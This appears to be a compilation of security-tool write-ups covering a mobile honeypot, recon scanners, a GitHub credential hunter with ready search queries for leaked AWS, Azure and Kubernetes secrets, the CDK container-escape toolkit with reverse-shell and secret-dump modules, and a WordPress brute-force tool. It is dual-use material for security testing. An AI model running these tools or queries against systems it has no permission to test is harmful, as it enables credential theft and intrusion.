
HosTaGe - Low Interaction Mobile Honeypot



HosTaGe is a lightweight, low-interaction, portable, and generic honeypot for mobile devices that aims at detecting malicious wireless network environments. As most malware propagates over the network via specific protocols, a low-interaction honeypot located on a mobile device can check wireless networks for actively propagating malware. We envision such honeypots running on all kinds of mobile devices, e.g., smartphones and tablets, to provide a quick assessment of the potential security state of a network.

HosTaGe emulates the following protocols as of the latest version: AMQP, COAP, ECHO, FTP, HTTP, HTTPS, MySQL, MQTT, MODBUS, S7COMM, SNMP, SIP, SMB, SSH, SMTP and TELNET


Download from Play Store!

The stable release of HosTaGe can be installed from the Google Play Store (Play Store Link), or scan the QR code below from your Android device.



References

The research behind HosTaGe has been published and presented in a number of scientific and industrial conferences. Below you can find some selected papers:

[1] Emmanouil Vasilomanolakis, Shankar Karuppayah, Mathias Fischer, Mihai Plasoianu, Wulf Pfeiffer, Lars Pandikow, Max Mühlhäuser: This Network is Infected: HosTaGe – a Low-Interaction Honeypot for Mobile Devices. SPSM@CCS 2013:43-48

[2] Emmanouil Vasilomanolakis, Shankar Karuppayah, Mathias Fischer, Max Mühlhäuser: HosTaGe: a Mobile Honeypot for Collaborative Defense. ACM SIN 2014:330-333

[3] Emmanouil Vasilomanolakis, Shreyas Srinivasa, Max Mühlhäuser: Did you really hack a nuclear power plant? An industrial control mobile honeypot. IEEE CNS 2015:729-730

[4] Emmanouil Vasilomanolakis, Shreyas Srinivasa, Carlos Garcia Cordero, Max Mühlhäuser: Multi-stage Attack Detection and Signature Generation with ICS Honeypots. IEEE/IFIP DISSECT@NOMS 2016:1227-1232

Download APK

HosTaGe-v2.2.11.apk Release-Notes (latest)

HosTaGe-v2.1.1.apk Release-Notes

HosTaGe-v2.0.0.apk Release-Notes

Wiki

The Wiki provides information on getting started and using the app. Wiki for HosTaGe can be found here: Wiki.

GUI



Original Authors

Emmanouil Vasilomanolakis - idea, guidance and suggestions during development

Contributors

Shreyas Srinivasa, lead developer, Aalborg University and Technische Universität Darmstadt (Github - @sastry17)

Eirini Lygerou, GSoC 2020 Developer (Github - @irinil)

Mihai Plasoianu, student developer, Technische Universität Darmstadt

Wulf Pfeiffer, student developer, Technische Universität Darmstadt

Lars Pandikow, student developer, Technische Universität Darmstadt

Researchers

Shankar Karuppayah, mentoring, developer, Technische Universität Darmstadt

Mathias Fischer, mentoring, Universität Hamburg

Max Mühlhäuser, mentoring, Technische Universität Darmstadt

Carlos Garcia Cordero, mentoring, Technische Universität Darmstadt

Features of HoneyRJ were an inspiration for this project. http://www.cse.wustl.edu/~jain/cse571-09/ftp/honey/manual.html

Encryption for the SSH protocol was taken from Ganymed SSH-2 and slightly modified. http://code.google.com/p/ganymed-ssh-2/

GSoC 2020

The project was actively developed with participation in Google Summer of Code 2020. More information about GSoC 2020 is available here.

HPFeeds

To access the hpfeeds from hostage please send an access request to hostage@es.aau.dk with your name and organization. Please note that access to the hpfeeds repository is provided only after an internal review.

Contact

Please use the Github issues to report any issues or for questions. Slack channel; Email




Git-Wild-Hunt - A Tool To Hunt For Credentials In Github Wild AKA Git*Hunt



A tool to hunt for credentials in the GitHub wild AKA git*hunt


Getting started
  1. Install the tool
  2. Configure your GitHub token
  3. Search for credentials
  4. See results: cat results.json | jq

Installation
  • requirements: virtualenv, python3
  1. Clone the project and cd into the project dir: git clone https://github.com/d1vious/git-wild-hunt && cd git-wild-hunt
  2. Create a virtualenv and install requirements: pip install virtualenv && virtualenv -p python3 venv && source venv/bin/activate && pip install -r requirements.txt

Continue to configuring a GitHub API key


Configuration git-wild-hunt.conf

Make sure you set a GitHub token. If you need to create one for your account, follow these instructions.

[global]
github_token = ''
# GitHub token for searching

output = results.json
# stores matches in JSON here

log_path = git-wild-hunt.log
# Sets the log_path for the logging file

log_level = INFO
# Sets the log level for the logging
# Possible values: INFO, ERROR

regexes = regexes.json
# regexes to check the git wild hunt search against

GitHub search examples

The -s flag accepts any GitHub advanced search query; see some examples below.


Find GCP JWT token files

python git-wild-hunt.py -s "extension:json filename:creds language:JSON"


Find AWS API secrets

python git-wild-hunt.py -s "path:.aws/ filename:credentials"


Find Azure JWT Token

python git-wild-hunt.py -s "extension:json path:.azure filename:accessTokens language:JSON"


Find GSUtils configs

python git-wild-hunt.py -s "path:.gsutil filename:credstore2"


Find Kubernetes config files

python git-wild-hunt.py -s "path:.kube filename:config"


Searching for Jenkins credentials.xml file

python git-wild-hunt.py -s "extension:xml filename:credentials.xml language:XML"


Find secrets in .circleci

python git-wild-hunt.py -s "extension:yml path:.circleci filename:config language:YAML"


Generic credentials.yml search

python git-wild-hunt.py -s "extension:yml filename:credentials.yml language:YAML"


Usage
usage: git-wild-hunt.py [-h] -s SEARCH [-c CONFIG] [-v]

optional arguments:
-h, --help show this help message and exit
-s SEARCH, --search SEARCH
search to execute
-c CONFIG, --config CONFIG
config file path
-v, --version shows current git-wild-hunt version

What checks get run regexes.json

This file contains all the regexes that will be used to check against the raw content field returned for a search. Feel free to add/modify and include any specific ones that match the credential you are trying to find. This was graciously borrowed from truffleHog.
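
For illustration, each entry in regexes.json maps a display name to a regular expression, in the truffleHog style (a minimal sketch; the exact patterns shipped with the tool may differ):

{
  "AWS API Key": "AKIA[0-9A-Z]{16}",
  "Slack Token": "(xox[pboa]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})"
}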

Currently verified credentials via regex:

  • AWS API Key
  • Amazon AWS Access Key ID
  • Amazon MWS Auth Token
  • Facebook Access Token
  • Facebook OAuth
  • Generic API Key
  • Generic Secret
  • GitHub
  • Google (GCP) Service-account
  • Google API Key
  • Google Cloud Platform API Key
  • Google Cloud Platform OAuth
  • Google Drive API Key
  • Google Drive OAuth
  • Google Gmail API Key
  • Google Gmail OAuth
  • Google OAuth Access Token
  • Google YouTube API Key
  • Google YouTube OAuth
  • Heroku API Key
  • MailChimp API Key
  • Mailgun API Key
  • PGP private key block
  • Password in URL
  • PayPal Braintree Access Token
  • Picatic API Key
  • RSA private key
  • SSH (DSA) private key
  • SSH (EC) private key
  • Slack Token
  • Slack Webhook
  • Square Access Token
  • Square OAuth Secret
  • Stripe API Key
  • Stripe Restricted API Key
  • Twilio API Key
  • Twitter Access Token
  • Twitter OAuth

Author

Contributor

Credits & References

Inspiration to write this tool came from the shhgit project


TO DO
  • better error handling


MobileHackersWeapons - Mobile Hacker's Weapons / A Collection Of Cool Tools Used By Mobile Hackers



A collection of cool tools used by mobile hackers. Happy hacking, happy bug-hunting!

Weapons
OS | Type | Name | Description
All | Analysis | RMS-Runtime-Mobile-Security | Runtime Mobile Security (RMS) is a powerful web interface that helps you to manipulate Android and iOS Apps at Runtime
All | Analysis | scrounger | Mobile application testing toolkit
All | Proxy | BurpSuite | The BurpSuite
All | Proxy | hetty | Hetty is an HTTP toolkit for security research.
All | Proxy | httptoolkit | HTTP Toolkit is a beautiful & open-source tool for debugging, testing and building with HTTP(S) on Windows, Linux & Mac
All | Proxy | proxify | Swiss Army knife Proxy tool for HTTP/HTTPS traffic capture, manipulation, and replay on the go.
All | Proxy | zaproxy | The OWASP ZAP core project
All | RE | frida | Clone this repo to build Frida
All | RE | frida-tools | Frida CLI tools
All | RE | fridump | A universal memory dumper using Frida
All | RE | ghidra | Ghidra is a software reverse engineering (SRE) framework
All | SCRIPTS | frida-scripts | A collection of my Frida.re instrumentation scripts to facilitate reverse engineering of mobile apps.
All | Scanner | Mobile-Security-Framework-MobSF | Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.
Android | Analysis | apkleaks | Scanning APK file for URIs, endpoints & secrets.
Android | Analysis | drozer | The Leading Security Assessment Framework for Android.
Android | NFC | nfcgate | An NFC research toolkit application for Android
Android | Pentest | Kali NetHunter | Mobile Penetration Testing Platform
Android | RE | Apktool | A tool for reverse engineering Android apk files
Android | RE | apkx | One-Step APK Decompilation With Multiple Backends
Android | RE | bytecode-viewer | A Java 8+ Jar & Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger & More)
Android | RE | dex-oracle | A pattern based Dalvik deobfuscator which uses limited execution to improve semantic analysis
Android | RE | dex2jar | Tools to work with android .dex and java .class files
Android | RE | enjarify | Enjarify is a tool for translating Dalvik bytecode to equivalent Java bytecode. This allows Java analysis tools to analyze Android applications.
Android | RE | jadx | Dex to Java decompiler
Android | RE | jd-gui | A standalone Java Decompiler GUI
Android | RE | procyon | Procyon is a suite of Java metaprogramming tools, including a rich reflection API, a LINQ-inspired expression tree API for runtime code generation, and a Java decompiler.
Android | Scanner | qark | Tool to look for several security related Android application vulnerabilities
iOS | Analysis | iFunBox | General file management software for iPhone and other Apple products
iOS | Analysis | idb | idb is a tool to simplify some common tasks for iOS pentesting and research
iOS | Analysis | needle | The iOS Security Testing Framework
iOS | Analysis | objection | objection - runtime mobile exploration
iOS | Bluetooth | toothpicker | ToothPicker is an in-process, coverage-guided fuzzer for iOS Bluetooth
iOS | Inject | bfinject | Dylib injection for iOS 11.0 - 11.1.2 with LiberiOS and Electra jailbreaks
iOS | RE | Clutch | Fast iOS executable dumper
iOS | RE | class-dump | Generate Objective-C headers from Mach-O files.
iOS | RE | frida-ios-dump | Pull decrypted ipa from a jailbroken device
iOS | RE | iRET | iOS Reverse Engineering Toolkit.
iOS | RE | momdec | Core Data Managed Object Model Decompiler
iOS | Unpinning | MEDUZA | A more or less universal SSL unpinning tool for iOS
iOS | Unpinning | ssl-kill-switch2 | Blackbox tool to disable SSL certificate validation - including certificate pinning - within iOS and OS X Apps


  

Reconftw - Simple Script For Full Recon



This is a simple script intended to perform a full recon on a target with multiple subdomains.


tl;dr
  • Requires Go
  • Run ./install.sh before first run (apt, rpm, pacman compatible)
git clone https://github.com/six2dez/reconftw
cd reconftw
chmod +x *.sh
./install.sh
./reconftw.sh -d target.com -a


Features
  • Tools checker
  • Google Dorks (based on deggogle_hunter)
  • Subdomain enumeration (passive, resolution, bruteforce and permutations)
  • Sub TKO (subjack and nuclei)
  • Web Prober (httpx)
  • Web screenshot (aquatone)
  • Template scanner (nuclei)
  • Port Scanner (naabu)
  • Url extraction (waybackurls, gau, hakrawler, github-endpoints)
  • Pattern Search (gf and gf-patterns)
  • Param discovery (paramspider and arjun)
  • XSS (Gxss and dalfox)
  • Github Check (git-hound)
  • Favicon Real IP (fav-up)
  • JS Checks (LinkFinder, SecretFinder, scripts from JSFScan)
  • Fuzzing (ffuf)
  • Cors (Corsy)
  • SSL Check (testssl)
  • Interlace integration
  • Custom output folder (default under Recon/target.com/)
  • Run standalone steps (subdomains, subtko, web, gdorks...)
  • Polished installer compatible with most distros

Mindmap/Workflow



Requirements
  • Golang > 1.14 installed and env vars correctly set ($GOPATH, $GOROOT)
  • Run ./install.sh

The installer is provided as is. Nobody knows your system better than you, so nobody can debug your system better than you. If you are experiencing issues with the installer script I can help you out, but keep in mind that it is not my main priority.

  • It is highly recommended, and in some cases essential, to set your API keys (see the example after this list):
    • amass (~/.config/amass/config.ini)
    • subfinder (~/.config/subfinder/config.yaml)
    • git-hound (~/.githound/config.yml)
    • github-endpoints.py (GITHUB_TOKEN env var)
    • favup (shodan init SHODANPAIDAPIKEY)
  • This script uses dalfox with the blind-XSS option; you must change it to your own server, check xsshunter.com.
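
For example, the GitHub token and Shodan key mentioned above could be prepared like this before a run (a hedged sketch; the placeholder values must be replaced with your own keys):

export GITHUB_TOKEN="<your-github-token>"   # read by github-endpoints.py
shodan init <your-shodan-api-key>           # used by fav-up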

Usage examples

Full scan:
./reconftw.sh -d target.com -a

Subdomains scan:
./reconftw.sh -d target.com -s

Web scan (target list required):
./reconftw.sh -d target.com -l targets.txt -w

Dorks:
./reconftw.sh -d target.com -g

Improvement plan:
  • Notification support (Slack, Discord and Telegram)
  • CMS tools (wpscan, drupwn/droopescan, joomscan)
  • Add menu option for every feature
  • Any other interesting suggestion
  • Open Redirect with Oralyzer
  • Enhance this Readme
  • Customize output folder
  • Interlace usage
  • Crawler
  • SubDomainizer
  • Install script
  • Apt,rpm,pacman compatible installer

Thanks

For their great feedback, support, help or for nothing special but well deserved:



CDK - Zero Dependency Container Penetration Toolkit



CDK is an open-sourced container penetration toolkit, designed to offer stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs that help you escape containers and take over K8s clusters easily.

It is currently still under development; submit issues or mail i@cdxy.me if you need any help.


Installation

Download the latest release from: https://github.com/cdk-team/CDK/releases/

Drop the executable files into the target container and start testing.
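
For instance, the binary could be copied into a running container like this (a hedged sketch; cdk_linux_amd64 is an assumed release file name, and target / mypod are placeholder container and pod names):

docker cp ./cdk_linux_amd64 target:/tmp/cdk     # via the Docker CLI on the host
kubectl cp ./cdk_linux_amd64 mypod:/tmp/cdk     # or into a K8s pod
chmod +x /tmp/cdk && /tmp/cdk evaluate          # then run it inside the container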


Usage
Usage:
cdk evaluate [--full]
cdk run (--list | <exploit> [<args>...])
cdk auto-escape <cmd>
cdk <tool> [<args>...]

Evaluate:
cdk evaluate Gather information to find weakness inside container.
cdk evaluate --full Enable file scan during information gathering.

Exploit:
cdk run --list List all available exploits.
cdk run <exploit> [<args>...] Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Auto Escape:
cdk auto-escape <cmd> Escape container in different ways then let target execute <cmd>.

Tool:
vi <file> Edit files in container like "vi" command.
ps Show process information like "ps -ef" command.
nc [options] Create TCP tunnel.
ifconfig Show network information.
kcurl <path> (get|post) <uri> <data> Make request to K8s api-server.
ucurl (get|post) <socket> <uri> <data> Make request to docker unix socket.
probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
-h --help Show this help msg.
-v --version Show version.

Features

CDK has three modules:

  1. Evaluate: gather information inside container to find potential weakness.
  2. Exploit: for container escaping, persistence and lateral movement.
  3. Tool: network-tools and APIs for TCP/HTTP requests, tunnels and K8s cluster management.

Evaluate Module

Usage

cdk evaluate [--full]

This command runs the checks below without local file scanning; use --full to enable all of them.

Tactics | Script | Usage/Example
Information Gathering | OS Basic Info | link
Information Gathering | Available Capabilities | link
Information Gathering | Available Linux Commands | link
Information Gathering | Mounts | link
Information Gathering | Net Namespace | link
Information Gathering | Sensitive ENV | link
Information Gathering | Sensitive Process | link
Information Gathering | Sensitive Local Files | link
Discovery | K8s Api-server Info | link
Discovery | K8s Service-account Info | link
Discovery | Cloud Provider Metadata API | link

Exploit Module

List all available exploits:

cdk run --list

Run targeted exploit:

cdk run <script-name> [options]
Tactic | Technique | CDK Exploit Name | Doc
Escaping | docker-runc CVE-2019-5736 | runc-pwn |
Escaping | docker-cp CVE-2019-14271 | |
Escaping | containerd-shim CVE-2020-15257 | shim-pwn | link
Escaping | dirtycow CVE-2016-5195 | |
Escaping | docker.sock PoC (DIND attack) | docker-sock-check | link
Escaping | docker.sock Backdoor Image Deploy | docker-sock-deploy | link
Escaping | Device Mount Escaping | mount-disk | link
Escaping | Cgroups Escaping | mount-cgroup | link
Escaping | Procfs Escaping | mount-procfs | link
Escaping | Ptrace Escaping PoC | check-ptrace | link
Discovery | K8s Component Probe | service-probe | link
Discovery | Dump Istio Sidecar Meta | istio-check | link
Lateral Movement | K8s Service Account Control | |
Lateral Movement | Attack K8s api-server | |
Lateral Movement | Attack K8s Kubelet | |
Lateral Movement | Attack K8s Dashboard | |
Lateral Movement | Attack K8s Helm | |
Lateral Movement | Attack K8s Etcd | |
Lateral Movement | Attack Private Docker Registry | |
Remote Control | Reverse Shell | reverse-shell | link
Credential Access | Access Key Scanning | ak-leakage | link
Credential Access | Dump K8s Secrets | k8s-secret-dump | link
Credential Access | Dump K8s Config | k8s-configmap-dump | link
Persistence | Deploy WebShell | |
Persistence | Deploy Backdoor Pod | k8s-backdoor-daemonset | link
Persistence | Deploy Shadow K8s api-server | k8s-shadow-apiserver | link
Persistence | K8s MITM Attack (CVE-2020-8554) | k8s-mitm-clusterip | link
Persistence | Deploy K8s CronJob | |
Defense Evasion | Disable K8s Audit | |

Tool Module

These commands run like their Linux counterparts, with slightly different input arguments; see the usage links.

cdk nc [options]
cdk ps
Command | Description | Usage/Example
nc | TCP Tunnel | link
ps | Process Information | link
ifconfig | Network Information | link
vi | Edit Files | link
kcurl | Request to K8s api-server | link
dcurl | Request to Docker HTTP API |
ucurl | Request to Docker Unix Socket | link
rcurl | Request to Docker Registry API |
probe | IP/Port Scanning | link

Developer Docs

TODO
  1. Echo loader for delivering CDK into target container via Web RCE.
  2. EDR defense evasion.
  3. Compile optimization.
  4. Dev docs


WPCracker - WordPress User Enumeration And Login Brute Force Tool



WordPress user enumeration and login Brute Force tool for Windows and Linux

With the Brute Force tool, you can control how aggressive an attack you want to perform, which affects the attack time required. The tool lets you adjust the number of threads as well as how large a batch of passwords each thread tests at a time. However, too much attack power can cause the victim's server to slow down.

For example, when I attacked my local server, it took about two days to go through rockyou.txt (14,341,564 unique passwords) using the program's presets for the number of threads (12) and the batch size (1000).

In this article, "victim" refers to the attacked WordPress site in a pentest lab. Attacking a WordPress site for which you do not have permission may be illegal.


Using:

User Enumeration
.\WPCracker.exe --enum -u <Url to victims WordPress page> -o <Output file path (OPTIONAL)>

OR JUST
.\WPCracker.exe --enum

In this case, the program only requests the required information


Brute Force

Using program's presets
.\WPCracker.exe --brute -u <Url to victims WordPress page> -p <Path to wordlist> -n <Username> -o <Output file path (OPTIONAL)>

OR JUST
.\WPCracker.exe --brute

In this case, the program only requests the required information


Using with custom settings
.\WPCracker.exe --brute -u <Url to victims WordPress page> -p <Path to wordlist> -n <Username> -t <Max threads> -c <Batch maximum size>
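
A concrete invocation with custom settings might look like this (a hedged example; the URL, wordlist path and username are placeholders, and the thread/batch values mirror the presets mentioned above):

.\WPCracker.exe --brute -u http://victim.local/ -p .\rockyou.txt -n admin -t 12 -c 1000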

Get help
.\WPCracker.exe --brute -?

This is for ethical use only :)

Thanks to adamabdelhamed's PowerArgs.


MetaFinder - Search For Documents In A Domain Through Google



Search For Documents In A Domain Through Google. The Objective Is To Extract Metadata.

Installing dependencies:
> git clone https://github.com/Josue87/MetaFinder.git
> cd MetaFinder
> pip3 install -r requirements.txt

Usage
python3 metafinder.py -t domain.com -l 20 [-v]

Parameters:

  • t: Specifies the target domain.
  • l: Specifies the maximum number of results to be searched.
  • v: Optional. It is used to display the results on the screen as well.

Author

This project has been developed by:


Disclaimer!

This Software has been developed for teaching purposes and for use with permission of a potential target. The author is not responsible for any illegitimate use.



Sigurlx - A Web Application Attack Surface Mapping Tool



sigurlx is a web application attack surface mapping tool; it does the following:

  • Categorize URLs into categories:
    > endpoint
    > js {js}
    > style {css}
    > data {json|xml|csv}
    > archive {zip|tar|tar.gz}
    > doc {pdf|xlsx|doc|docx|txt}
    > media {jpg|jpeg|png|ico|svg|gif|webp|mp3|mp4|woff|woff2|ttf|eot|tif|tiff}
  • Next, probe the URLs with HTTP requests for status_code, content_type, etc.
  • Next, for every URL of category endpoint with a query:

Usage

To display help message for sigurlx use the -h flag:

$ sigurlx -h

_ _
___(_) __ _ _ _ _ __| |_ __
/ __| |/ _` | | | | '__| \ \/ /
\__ \ | (_| | |_| | | | |> <
|___/_|\__, |\__,_|_| |_/_/\_\ v2.1.0
|___/

USAGE:
sigurlx [OPTIONS]

GENERAL OPTIONS:
-iL input urls list (use `-iL -` to read from stdin)
-threads number concurrent threads (default: 20)
-update-params update params file

HTTP OPTIONS:
-delay delay between requests (default: 100ms)
-follow-redirects follow redirects (default: false)
-follow-host-redirects follow internal redirects i.e, same host redirects (default: false)
-http-proxy HTTP Proxy URL
-timeout HTTP request timeout (default: 10s)
-UA HTTP user agent

OUTPUT OPTIONS:
-nC no color mode
-oJ JSON output file (default: ./sigurlx.json)
-v verbose mode
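
A typical run against a list of URLs might look like this (a hedged example built from the flags above; urls.txt is an assumed input file):

$ sigurlx -iL urls.txt -oJ sigurlx.json -threads 20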

Installation

From Binary

You can download the pre-built binary for your platform from this repository's releases page, extract it, then move it to your $PATH and you're ready to go.


From Source

sigurlx requires go1.14+ to install successfully. Run the following command to get the repo

▶ go get -u github.com/drsigned/sigurlx/cmd/sigurlx

From Github
▶ git clone https://github.com/drsigned/sigurlx.git
▶ cd sigurlx/cmd/sigurlx/
▶ go build .
▶ mv sigurlx /usr/local/bin/
▶ sigurlx -h

Contribution

Issues and Pull Requests are welcome!




Zmap - A Fast Single Packet Network Scanner Designed For Internet-wide Network Surveys



ZMap is a fast single packet network scanner designed for Internet-wide network surveys. On a typical desktop computer with a gigabit Ethernet connection, ZMap is capable of scanning the entire public IPv4 address space in under 45 minutes. With a 10GigE connection and PF_RING, ZMap can scan the IPv4 address space in under 5 minutes.

ZMap operates on GNU/Linux, Mac OS, and BSD. ZMap currently has fully implemented probe modules for TCP SYN scans, ICMP, DNS queries, UPnP, BACNET, and can send a large number of UDP probes. If you are looking to do more involved scans, e.g., banner grab or TLS handshake, take a look at ZGrab, ZMap's sister project that performs stateful application-layer handshakes.


Installation

The latest stable release of ZMap is version 2.1.1 and supports Linux, macOS, and BSD. We recommend installing ZMap from HEAD rather than using a distro package manager.

Instructions on building ZMap from source can be found in INSTALL.


Usage

A guide to using ZMap is found in our GitHub Wiki.
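
As a quick illustration, a basic single-port TCP SYN scan of a subnet can be run like this (a hedged example; the port, output file and target range are placeholders):

zmap -p 443 -o results.csv 10.0.0.0/8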



Xnuspy - An iOS Kernel Function Hooking Framework For Checkra1N'Able Devices


Output from the kernel log after compiling and running example/open1_hook.c

xnuspy is a pongoOS module which installs a new system call, xnuspy_ctl, allowing you to hook kernel functions from userspace. It supports iOS 13.x and 14.x on checkra1n 0.12.2 and up. 4K devices are not supported.

Requires libusb: brew install libusb


Building

Run make in the top level directory. It'll build the loader and the module. If you want debug output from xnuspy to the kernel log, run XNUSPY_DEBUG=1 make.


Usage

After you've built everything, have checkra1n boot your device to a pongo shell: /Applications/checkra1n.app/Contents/MacOS/checkra1n -p

In the same directory you built the loader and the module, do loader/loader module/xnuspy. After doing that, xnuspy will do its thing and in a few seconds your device will boot. loader will wait a couple more seconds after issuing xnuspy-getkernelv in case SEPROM needs to be exploited.


Known Issues

Sometimes a couple of my phones would get stuck at "Booting" after checkra1n's KPF runs. I have yet to figure out what causes this, but if it happens, try again. Also, if the device hangs after bootx, try again. Finally, marking the compiled xnuspy_ctl code as executable on my iPhone X running iOS 13.3.1 is a bit spotty, but succeeds 100% of the time on my other phones. If you panic with a kernel instruction fetch abort when you execute your hook program, try again.


xnuspy_ctl

xnuspy will patch an enosys system call to point to xnuspy_ctl_tramp. This is a small trampoline which marks the compiled xnuspy_ctl code as executable and branches to it. You can find xnuspy_ctl's implementation at module/el1/xnuspy_ctl/xnuspy_ctl.c and examples in the example directory. That directory also contains xnuspy_ctl.h, a header which defines constants for xnuspy_ctl. It is meant to be included in all programs which call it.

You can use sysctlbyname to figure out which system call was patched:

size_t oldlen = sizeof(long);
long SYS_xnuspy_ctl = 0;
/* query the sysctl registered by xnuspy to learn which call number was patched */
sysctlbyname("kern.xnuspy_ctl_callnum", &SYS_xnuspy_ctl, &oldlen, NULL, 0);

This system call takes four arguments, flavor, arg1, arg2, and arg3. The flavor can either be XNUSPY_CHECK_IF_PATCHED, XNUSPY_INSTALL_HOOK, XNUSPY_REGISTER_DEATH_CALLBACK, XNUSPY_CALL_HOOKME, or XNUSPY_CACHE_READ. The meaning of the next three arguments depend on the flavor.


XNUSPY_CHECK_IF_PATCHED

This exists so you can check if xnuspy_ctl is present. Invoking it with this flavor will cause it to return 999. The values of the other arguments are ignored.


XNUSPY_INSTALL_HOOK

I designed this flavor to match MSHookFunction's API. arg1 is the UNSLID address of the kernel function you wish to hook. If you supply a slid address, you will most likely panic. arg2 is a pointer to your ABI-compatible replacement function. arg3 is a pointer for xnuspy_ctl to copyout the address of a trampoline that represents the original kernel function. This can be NULL if you don't intend to call the original.


XNUSPY_REGISTER_DEATH_CALLBACK

This flavor allows you to register an optional "death callback", a function xnuspy will call when your hook program exits. It gives you a chance to clean up anything you created from your kernel hooks. If you created any kernel threads, you would tell them to terminate in this function.

Your callback is not invoked asynchronously, so if you block, you're preventing xnuspy's garbage collection thread from executing.

arg1 is a pointer to your callback function. The values of the other arguments are ignored.


XNUSPY_CALL_HOOKME

hookme is a small assembly stub which xnuspy exports through the xnuspy cache for you to hook. Invoking xnuspy_ctl with this flavor will cause hookme to get called, providing a way for you to easily gain kernel code execution without having to hook an actual kernel function.

There are no arguments for this flavor.


XNUSPY_CACHE_READ

This flavor gives you a way to read from the xnuspy cache. It contains many useful things like kprintf, current_proc, kernel_thread_start, and the kernel slide so you don't have to find them yourself. For a complete list of cache IDs, check out example/xnuspy_ctl.h.

arg1 is one of the cache IDs defined in xnuspy_ctl.h and arg2 is a pointer for xnuspy_ctl to copyout the address or value of what you requested.


Errors

For all flavors except XNUSPY_CHECK_IF_PATCHED, 0 is returned on success. Upon error, -1 is returned and errno is set. XNUSPY_CHECK_IF_PATCHED does not return any errors.


Errors Pertaining to XNUSPY_INSTALL_HOOK

errno is set to...

  • EEXIST if:
    • A hook already exists for the unslid kernel function denoted by arg1.
  • ENOMEM if:
    • kalloc_canblock or kalloc_external returned NULL.
  • ENOSPC if:
    • There are no free xnuspy_tramp structs or reflector pages. These data structures are internal to xnuspy. This should never happen unless you are hooking hundreds of kernel functions at the same time.
  • EFAULT if:
    • current_map()->hdr.vme_start is not a pointer to the calling process's Mach-O header.
  • ENOENT if:
    • map_caller_segments was unable to find __TEXT and __DATA for the calling process.
  • EIO if:
    • mach_make_memory_entry_64 did not return a memory entry for the entirety of the calling process's __TEXT and __DATA segments.

errno also depends on the return value of vm_map_wire_external, mach_vm_map_external, copyin, copyout, and if applicable, the one-time initialization function. An errno of 10000 represents a kern_return_t value that I haven't yet accounted for (and a message is printed to the kernel log about it if you compiled with XNUSPY_DEBUG=1).

If this flavor returns an error, the target kernel function was not hooked. If you passed a non-NULL pointer for arg3, it may or may not have been initialized. It's unsafe to use if it was.


Errors Pertaining to XNUSPY_REGISTER_DEATH_CALLBACK

errno is set to...

  • ENOENT if:
    • The calling process hasn't hooked any kernel functions.

If this flavor returns an error, your death callback was not registered.


Errors Pertaining to XNUSPY_CALL_HOOKME

errno is set to...

  • ENOTSUP if:
    • hookme is too far away from the page of xnuspy_tramp structures. This is determined inside of pongoOS, and can only happen if xnuspy had to fallback to unused code already inside of the kernelcache. In this case, calling hookme would almost certainly cause a kernel panic, and you'll have to figure out another kernel function to hook.

If this flavor returns an error, hookme was not called.


Errors Pertaining to XNUSPY_CACHE_READ

errno is set to...

  • EINVAL if:
    • The constant denoted by arg1 does not represent anything in the cache.
    • arg1 was KALLOC_EXTERNAL, but the kernel is iOS 13.x.
    • arg1 was KALLOC_CANBLOCK, but the kernel is iOS 14.x.
    • arg1 was KFREE_EXT, but the kernel is iOS 13.x.
    • arg1 was KFREE_ADDR, but the kernel is iOS 14.x.

errno also depends on the return value of copyout and if applicable, the return value of the one-time initialization function.

If this flavor returns an error, the pointer you passed for arg2 was not initialized.


Important Information

Common Pitfalls

While writing replacement functions, it was easy to forget that I was writing kernel code. Here's a couple things to keep in mind when you're writing hooks:

  • You cannot execute any userspace code that lives outside your program's __TEXT segment. You will panic if, for example, you accidentally call printf instead of kprintf. You need to re-implement any libc function you wish to call. You can create function pointers to other kernel functions and call those, though.
  • Many macros commonly used in userspace code are unsafe for the kernel. For example, PAGE_SIZE expands to vm_page_size, not a constant. You need to disable PAN (on A10+, which I also don't recommend doing) before reading this variable or you will panic.
  • Just to be safe, don't compile your hook programs with compiler optimizations.

Skimming https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/KernelProgramming/style/style.html is also recommended.


Logging

For some reason, logs from os_log_with_args don't show up in the stream outputted from the command line tool oslog. Logs from kprintf don't make it there either, but they can be seen with dmesg. However, dmesg isn't a live feed, so I wrote klog, a tool which shows kprintf logs in real time. Find it in klog/. I strongly recommend using that instead of spamming dmesg for your kprintf messages.


Debugging Kernel Panics

Bugs are inevitable when writing code, so eventually you're going to cause a kernel panic. A panic doesn't necessarily mean there's a bug with xnuspy, so before opening an issue, please make sure that you still panic when you do nothing but call the original function and return its value (if needed). If you still panic, then it's likely an xnuspy bug (and please open an issue), but if not, there's something wrong with your replacement.

Since xnuspy does not actually redirect execution to EL0 pages, debugging a panic isn't as straightforward. Open up module/el1/xnuspy_ctl/xnuspy_ctl.c, and right before the only call to kwrite_instr in xnuspy_install_hook, add a call to IOSleep for a couple seconds. This is done to make sure there's enough time before the device panics for logs to propagate. Re-compile xnuspy with XNUSPY_DEBUG=1 make -B and load the module again. After loading the module, if you haven't already, compile klog from klog/. Upload it to your device and do stdbuf -o0 ./klog | grep shared_mapping_kva. Run your hook program again and watch for a line from klog that looks like this:

shared_mapping_kva: dist 0x780c replacement 0x100cd780c umh 0x100cd0000 kmh 0xfffffff0311c0000

If you're installing more than one hook, there will be more than one occurrence. In that case, dist and replacement will vary, but umh and kmh won't. kmh points to the beginning of the kernel's mapping of your program's __TEXT segment. Throw your hook program into your favorite disassembler and rebase it so its Mach-O header is at the address of kmh. For IDA Pro, that's Edit -> Segments -> Rebase program... with Image base bubbled. After your device panics and reboots again, if there are addresses which correspond to the kernel's mapping of your replacement in the panic log, they will match up with the disassembly. If there are none, then you probably have some sort of subtle memory corruption inside your replacement.


Hook Uninstallation

xnuspy will manage this for you. Once a process exits, all the kernel hooks that were installed by that process are uninstalled within a second or so.


Hookable Kernel Functions

Most function hooking frameworks have some minimum length that makes a given function hookable. xnuspy has this limit only if you plan to call the original function and the first instruction of the hooked function is not B. In this case, the minimum length is eight bytes. Otherwise, there is no minimum length.

